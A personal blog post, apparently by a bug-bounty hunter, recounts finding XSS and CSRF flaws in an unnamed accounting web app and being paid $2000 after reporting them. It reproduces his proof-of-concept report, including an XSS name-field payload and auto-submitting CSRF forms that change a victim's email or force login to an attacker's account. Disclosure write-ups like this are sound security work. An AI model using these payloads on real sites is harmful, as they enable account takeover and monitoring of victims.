How I made $2000 in 15 minutes

When I am not hunting I read about startups ,what’s happening in valley. I check their site , as a security guy I cannot control myself from checking their security. In the process , I came across this accounting web application (they are quite famous and making big bucks, I won’t take the name as they might get disturbed after this post. ) I was just testing for common bug XSS,CSRF and all regular stuff. 55013960   Every field was vulnerable to XSS and every form was vulnerable to CSRF as  token was not validating . Used Contact Us section from the site. Some non-technical lady replied “Thanks for contacting us , we don’t have any reward scheme or anything” .   55014089     Let’s give it one more try, this time I used About US page, googled the name of the engineer , found his Github  account and found his gmail there. He was really nice to me. test       Later we had Video chat on Skype , he was explaining me things ,asking me about my background.He was impressed. Following is a copy paste from the original POC that I sent back then   1. XSS:- javascript is not  filtered ,hence any arbitrary javascript code can be executed. Hence with document.cookie , a user’s cookie can be stolen ,that can lead to full account take over. step to reproduce: enter “”;</script><script>alert(/XSS/)</script><” as your first or last name .

2. CSRF: the CSRF token with update profile form is not getting validated on server side. Hence user’s email can be changed by anyattacker. Which later can be used to abuse forget password to take over whole account. step to reproduce:

1. login to your account and copy the below code in test.html , open test.html following code will change your name to manish bhattacharya as well as email

<html> <head>

<title>test for csrf</title></head>

<body> <form method=”POST” action=”” name=”manish” >

<input type=”hidden” name=”_method” value=”put” />

<input type=”hidden” name=”user[first_name]” value=”Manish” />

<input type=”hidden” name=”user[last_name]” value=”Bhattacharya” />

<input type=”hidden” name=”user[email]” value=”” />

<input type=”hidden” name=”user[time_zone]” value=”Pacific+Time+%28US+%26+Canada%29″ />

</form> <script> document.manish.submit(); </script>



3.There is no CSRF token with logout and login form CSRF token is not getting validated on server side. This can be abused by attacker to login to his account and monitor his activity and gain important information.

step to reproduce: login to your account and copy the following code in test1.html ,open test1.html you will be logout and login in my account automatically.



<title>test for csrf</title>



<img src=”” />

<form method=”POST” action=”” name=”manish” >

<input type=”hidden” name=”user[email]” value=”” />

<input type=”hidden” name=”user[password]” value=”hello12345″ />

<input type=”hidden” name=”commit” value=”Log+in” />

</form> <script> document.manish.submit(); </script>



4.there is no x-frame header on the site. x-frame header is something that restrict the framing of the site, most the web application use this to protect their users.the absence of such headers can cause clickjacking attacks( with the users.   He got back after after 2 days with this :test1    I was like :   rich_snob_meme_by_gothicgir66-d3crub7(sorry 😦 Mr. gates 😛 nothing personal )  .

I reported various issues for free after this and I do share a good relation with company peoples.It took me hardly 10 or 15 minutes for those general bug.   P.S. – Don’t ask me the name of the company, I won’t tell 😦

Logging off…


2 thoughts on “How I made $2000 in 15 minutes

  1. Have you considered writing a tutorial about finding and abusing CSRF vulnerabilities in web applications? For instance, your strategy in looking for CSRF bugs in web applications

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s